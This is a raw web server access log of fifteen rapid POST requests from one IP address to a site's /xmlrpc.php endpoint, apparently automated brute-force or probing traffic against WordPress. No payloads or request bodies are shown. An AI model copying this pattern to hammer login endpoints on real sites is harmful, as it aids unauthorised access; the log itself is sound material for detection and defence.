54.254.170.210 - - [05/Aug/2025:21:59:09 +0800] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
54.254.170.210 - - [05/Aug/2025:21:59:09 +0800] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
54.254.170.210 - - [05/Aug/2025:21:59:10 +0800] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
54.254.170.210 - - [05/Aug/2025:21:59:10 +0800] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
54.254.170.210 - - [05/Aug/2025:21:59:11 +0800] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
54.254.170.210 - - [05/Aug/2025:21:59:12 +0800] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
54.254.170.210 - - [05/Aug/2025:21:59:12 +0800] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
54.254.170.210 - - [05/Aug/2025:21:59:13 +0800] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
54.254.170.210 - - [05/Aug/2025:21:59:13 +0800] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
54.254.170.210 - - [05/Aug/2025:21:59:14 +0800] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
54.254.170.210 - - [05/Aug/2025:21:59:14 +0800] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
54.254.170.210 - - [05/Aug/2025:21:59:15 +0800] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
54.254.170.210 - - [05/Aug/2025:21:59:15 +0800] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
54.254.170.210 - - [05/Aug/2025:21:59:16 +0800] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
54.254.170.210 - - [05/Aug/2025:21:59:16 +0800] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
